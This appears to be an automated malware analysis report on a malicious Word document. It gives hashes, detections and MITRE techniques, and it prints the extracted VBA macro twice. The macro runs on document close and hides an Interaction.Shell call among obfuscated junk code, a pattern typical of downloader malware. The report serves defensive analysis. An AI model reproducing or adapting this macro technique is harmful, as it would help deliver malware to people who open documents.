Office (OLE) malware analysis — malicious · b83c0865858bccbc

MALICIOUS

Office (OLE)

105.6 KB Created: 2018-12-19 16:27:00 Authoring application: Microsoft Office Word First seen: 2019-03-18

MD5: 79cd8ce55ce24f6145845095e7aa8fa3 SHA-1: d9aa9deb6203c7561c4b2ba14e5e87445761f926 SHA-256: b83c0865858bccbce5c01b0742388e42a0488eb30fcee7721976c5cdfed00d7b

250 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The 'autoclose' macro triggers a Shell() call, which is highly suspicious and indicative of malware execution. The script attempts to download and execute a payload, as evidenced by the Shell() call and the 'Doc.Downloader' ClamAV detection. The specific payload or destination is obfuscated within the script.

Heuristics 8

ClamAV: Doc.Downloader.Generic-6789372-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Generic-6789372-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code

Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA

Matched line in script

      End Select
S67943 = Array(Q494600809, v49713, j476169, Interaction.Shell(CVar("" + S2212509 + s131557 + w38655703 + R626178 + b39699628.TextBox1) + Y7118227 + j38152, 35 - 35), i86854)
   Select Case j903

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Auto_Close macro low OLE_VBA_AUTOCLOSE

Auto_Close macro

Matched line in script

Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoclose()
A93977

Suspicious cmd.exe invocation with execution flag high SC_STR_CMD

Suspicious cmd.exe invocation with execution flag
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3857 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	3857 bytes
SHA-256: `a6bc010fbbfc41d20260c0c0f3ca65b3f48ce99b9b46c08537bf4c2344d4ee23`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "b39699628" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox" Sub autoclose() A93977 End Sub Attribute VB_Name = "r796538400108" Function A93977() On Error Resume Next Select Case l4106 Case 182722759 E100 = J6497 b015 = Rnd(w4278 - Round(k431) / 332908678 - Round(Z0979)) E3035 = V989 z0739 = Rnd(c406 * Tan(239407366)) Case 126165365 j6379 = n8710 c801 = v798 End Select Select Case R9856 Case 274218981 s095 = R231 v0577 = Rnd(R957 - Round(J5881) / 69701613 - Round(l8846)) H5293 = z5454 t9875 = Rnd(F2276 * Tan(17333469)) Case 229287622 G464 = c485 C570 = W9059 End Select S67943 = Array(Q494600809, v49713, j476169, Interaction.Shell(CVar("" + S2212509 + s131557 + w38655703 + R626178 + b39699628.TextBox1) + Y7118227 + j38152, 35 - 35), i86854) Select Case j903 Case 134579612 i396 = k059 N998 = Rnd(c9216 - Round(I1229) / 260039581 - Round(v2683)) Y294 = p480 z9544 = Rnd(w929 * Tan(114411349)) Case 167667808 n520 = d776 T3875 = P3224 End Select Select Case z698 Case 271356251 f127 = C9037 O364 = Rnd(w5059 - Round(i949) / 295338709 - Round(j4956)) A2447 = d0550 r8847 = Rnd(r446 * Tan(149331870)) Case 85010848 J233 = n7866 O690 = v6308 End Select Select Case O783 Case 324183500 W231 = m392 z201 = Rnd(G0677 - Round(u8765) / 88034141 - Round(u3311)) P491 = k245 G858 = Rnd(I7373 * Tan(143913007)) Case 179092980 i675 = w0101 o630 = w655 End Select Select Case w7932 Case 215674546 n6956 = Z3897 T331 = Rnd(z963 - Round(C3177) / 198778011 - Round(K3065)) A471 = B357 b2587 = Rnd(N3171 * Tan(186124069)) Case 225347770 r107 = i8090 o604 = A3475 End Select End Function Attribute VB_Name = "W5827652012" Attribute VB_Name = "s32425311" Attribute VB_Name = "a2972487186" Attribute VB_Name = "X0023386565019" Attribute VB_Name = "E549476790736" Attribute VB_Name = "S7403528890" Attribute VB_Name = "i2579042858" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "M375162137" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "P07614713292770" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "w92920624" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "T4566761767" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False

SHA-256: a6bc010fbbfc41d20260c0c0f3ca65b3f48ce99b9b46c08537bf4c2344d4ee23

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "b39699628"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoclose()
A93977
End Sub

Attribute VB_Name = "r796538400108"
Function A93977()
On Error Resume Next
   Select Case l4106
         Case 182722759
 E100 = J6497
b015 = Rnd(w4278 - Round(k431) / 332908678 - Round(Z0979))
E3035 = V989
z0739 = Rnd(c406 * Tan(239407366))
         Case 126165365
j6379 = n8710
c801 = v798
      End Select
   Select Case R9856
         Case 274218981
 s095 = R231
v0577 = Rnd(R957 - Round(J5881) / 69701613 - Round(l8846))
H5293 = z5454
t9875 = Rnd(F2276 * Tan(17333469))
         Case 229287622
G464 = c485
C570 = W9059
      End Select
S67943 = Array(Q494600809, v49713, j476169, Interaction.Shell(CVar("" + S2212509 + s131557 + w38655703 + R626178 + b39699628.TextBox1) + Y7118227 + j38152, 35 - 35), i86854)
   Select Case j903
         Case 134579612
 i396 = k059
N998 = Rnd(c9216 - Round(I1229) / 260039581 - Round(v2683))
Y294 = p480
z9544 = Rnd(w929 * Tan(114411349))
         Case 167667808
n520 = d776
T3875 = P3224
      End Select
   Select Case z698
         Case 271356251
 f127 = C9037
O364 = Rnd(w5059 - Round(i949) / 295338709 - Round(j4956))
A2447 = d0550
r8847 = Rnd(r446 * Tan(149331870))
         Case 85010848
J233 = n7866
O690 = v6308
      End Select
   Select Case O783
         Case 324183500
 W231 = m392
z201 = Rnd(G0677 - Round(u8765) / 88034141 - Round(u3311))
P491 = k245
G858 = Rnd(I7373 * Tan(143913007))
         Case 179092980
i675 = w0101
o630 = w655
      End Select
   Select Case w7932
         Case 215674546
 n6956 = Z3897
T331 = Rnd(z963 - Round(C3177) / 198778011 - Round(K3065))
A471 = B357
b2587 = Rnd(N3171 * Tan(186124069))
         Case 225347770
r107 = i8090
o604 = A3475
      End Select
End Function


Attribute VB_Name = "W5827652012"

Attribute VB_Name = "s32425311"

Attribute VB_Name = "a2972487186"

Attribute VB_Name = "X0023386565019"

Attribute VB_Name = "E549476790736"

Attribute VB_Name = "S7403528890"

Attribute VB_Name = "i2579042858"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "M375162137"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "P07614713292770"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "w92920624"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "T4566761767"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Open this report in the interactive analyzer, or submit your own file for analysis.